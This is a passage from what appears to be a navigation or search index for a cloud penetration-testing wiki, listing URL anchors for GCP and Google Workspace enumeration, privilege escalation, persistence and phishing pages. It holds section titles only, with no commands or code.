-and-networking.html#subnetworks","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#firewalls","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#hierarchical-firewall-policies","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#firewall-rules-evaluation","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#vpc-network-peering","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#gcp---composer-enum","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#gcp---containers--gke-enum","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#containers","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#node-pools","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#kubernetes","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#tls-boostrap-privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.html#secrets-in-kubelet-api","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#gcp----dataproc-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#basic-infromation","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#components","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#cluster-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#job-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---dns-enum","pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.html#gcp---cloud-dns","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#gcp---filestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#connections","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#backups","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#gcp---firebase-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#firebase","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#authenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#access-info-with-appid-and-api-key","pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#gcp---firestore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.html#cloud-firestore","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#gcp---iam-principals--org-policies-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#service-accounts","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#users--groups","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeration-1","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#iam","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#default-permissions","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#set-iam-policy-vs-add-iam-policy-binding","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#enumeration-2","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#cloudasset-iam-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#testiampermissions-enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#org-policies","pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.html#privesc-1","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#gcp---kms-enum","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#kms","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#key-protection-level","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#key-purposes","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#rotation-period--programmed-for-destruction-period","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#primary-version","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#gcp---logging-enum","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#logs-flow","pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.html#configurations-supported-by-gcp-logging","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#gcp---memorystore-enum","pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.html#memorystore","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#gcp---monitoring-enum","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#policies","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#dashboards","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#channels","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#snoozers","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#gcp---pubsub-enum","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#snapshots--schemas","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#pubsub-lite","pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.html#enumeration-1","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#gcp---secrets-manager-enum","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#secret-manager","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.html#rotation-misuse","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#gcp---security-enum","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#security-command-center","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#threats","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#detections-and-controls","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#data-protection","pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.html#zero-trust","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#gcp---source-repositories-enum","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#offsec-information","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#open-in-cloud-shell","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#gcp---spanner-enum","pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.html#cloud-spanner","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#gcp---stackdriver-enum","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#stackdriver-logging","pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#gcp---storage-enum","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#storage-types","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#access-control","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#versioning","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#retention-policy","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#public-access","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#hmac-keys","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#gcp---workflows-enum","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.html#privesc-and-post-exploitation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#from-gcp-to-gws","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#domain-wide-delegation-basics","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#compromise-existing-delegation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#create-a-new-delegation-persistence","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#creating-a-project-to-enumerate-workspace","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#abusing-gcloud-credentials","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#from-gws-to-gcp","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#access-privileged-gcp-users","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#google-groups-privilege-escalation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/index.html#references","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#gcp---understanding-domain-wide-delegation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#understanding-domain-wide-delegation","pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.html#domain-wide-delegation-under-the-hood","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#gcp---unauthenticated-enum--access","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#public-assets-discovery","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#public-resources-brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/index.html#buckets-firebase-apps--cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#gcp---api-keys-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#api-keys","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#osint-techniques","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#check-origin-gcp-project","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.html#brute-force-api-endspoints","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#gcp---app-engine-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#app-engine","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.html#brute-force-subdomains","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#gcp---artifact-registry-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#artifact-registry","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.html#dependency-confusion","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#gcp---cloud-build-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloud-build","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#cloudbuildyml","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.html#pr-approvals","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#gcp---cloud-functions-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#brute-force-urls","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.html#enumerate-open-cloud-functions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#gcp---cloud-run-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.html#enumerate-open-cloud-run","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#gcp---cloud-sql-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#cloud-sql","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.html#brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#gcp---compute-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#compute","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#ssrf---server-side-request-forgery","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.html#vulnerable-exposed-services","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#gcp---iam-principals--org-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#iam--gcp-principals","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#is-domain-used-in-workspace","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.html#enumerate-emails-and-service-accounts","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#gcp---source-repositories-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#source-repositories","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.html#compromise-external-repository","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#gcp---storage-unauthenticated-enum","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#storage","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#public-bucket-brute-force","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/index.html#search-open-buckets-in-current-account","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#gcp---public-buckets-privilege-escalation","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#buckets-privilege-escalation","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#check-permissions","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#escalating","pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.html#references","pentesting-cloud/workspace-security/index.html#gws---workspace-pentesting","pentesting-cloud/workspace-security/index.html#entry-points","pentesting-cloud/workspace-security/index.html#google-platforms-and-oauth-apps-phishing","pentesting-cloud/workspace-security/index.html#password-spraying","pentesting-cloud/workspace-security/index.html#post-exploitation","pentesting-cloud/workspace-security/index.html#gws-gcp-pivoting","pentesting-cloud/workspace-security/index.html#gws--gcpw--gcds--directory-sync-ad--entraid","pentesting-cloud/workspace-security/index.html#persistence","pentesting-cloud/workspace-security/index.html#context-aware-access","pentesting-cloud/workspace-security/index.html#account-compromised-recovery","pentesting-cloud/workspace-security/index.html#references","pentesting-cloud/workspace-security/gws-post-exploitation.html#gws---post-exploitation","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-groups-privesc","pentesting-cloud/workspace-security/gws-post-exploitation.html#access-groups-mail-info","pentesting-cloud/workspace-security/gws-post-exploitation.html#gcp--gws-pivoting","pentesting-cloud/workspace-security/gws-post-exploitation.html#takeout---download-everything-google-knows-about-an-account","pentesting-cloud/workspace-security/gws-post-exploitation.html#vault---download-all-the-workspace-data-of-users","pentesting-cloud/workspace-security/gws-post-exploitation.html#contacts-download","pentesting-cloud/workspace-security/gws-post-exploitation.html#cloudsearch","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-chat","pentesting-cloud/workspace-security/gws-post-exploitation.html#google-drive-mining","pentesting-cloud/workspace-security/gws-post-exploitation.html#keep-notes","pentesting-cloud/workspace-security/gws-post-exploitation.html#modify-app-scripts","pentesting-cloud/workspace-security/gws-post-exploitation.html#administrate-workspace","pentesting-cloud/workspace-security/gws-post-exploitation.html#references","pentesting-cloud/workspace-security/gws-persistence.html#gws---persistence","pentesting-cloud/workspace-security/gws-persistence.html#persistence-in-gmail","pentesting-cloud/workspace-security/gws-persistence.html#app-passwords","pentesting-cloud/workspace-security/gws-persistence.html#change-2-fa-and-similar","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via-oauth-apps","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via-delegation","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via-android-app","pentesting-cloud/workspace-security/gws-persistence.html#persistence-via--app-scripts","pentesting-cloud/workspace-security/gws-persistence.html#references","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gws---workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad--entraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gcsd---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/index.html#admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#gws---admin-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#from-adentraid---google-workspace--gcp","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.html#from-google-workspace---adentraid","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---google-cloud-directory-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---disk-tokens--ad-credentials","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---dumping-tokens-from-memory","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---generating-access-tokens-from-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.html#gcds---scopes","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---google-credential-provider-for-windows","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---mitm","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---fingerprint","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---get-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---registry-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---disk-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---dumping-tokens-from-processes-memory","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---generating-access-tokens-from-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---scopes","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---recovering-clear-text-password","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#gcpw---recovering-locally-stored-password-hash","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.html#references","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---google-password-sync","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#basic-information","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---configuration","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---dumping-password-and-token-from-disk","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---dumping-tokens-from-memory","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---generating-access-tokens-from-refresh-tokens","pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.html#gps---scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#gws---google-platforms-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#generic-phishing-methodology","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-groups-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-chat-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-doc-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#google-calendar-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-redirect-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#app-scripts-oauth-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#oauth-apps-phishing","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#unverified-app-prompt","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#interesting-scopes","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#create-an-oauth-app","pentesting-cloud/workspace-security/gws-google-platforms-phishing/index.html#references","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#gws---app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-scripts","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#create-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#app-script-scenario","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#create-google-sheet-with-app-script","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#leak-token","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#create-trigger","pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.html#sharing","pentesting-cloud/workspace-security/gws-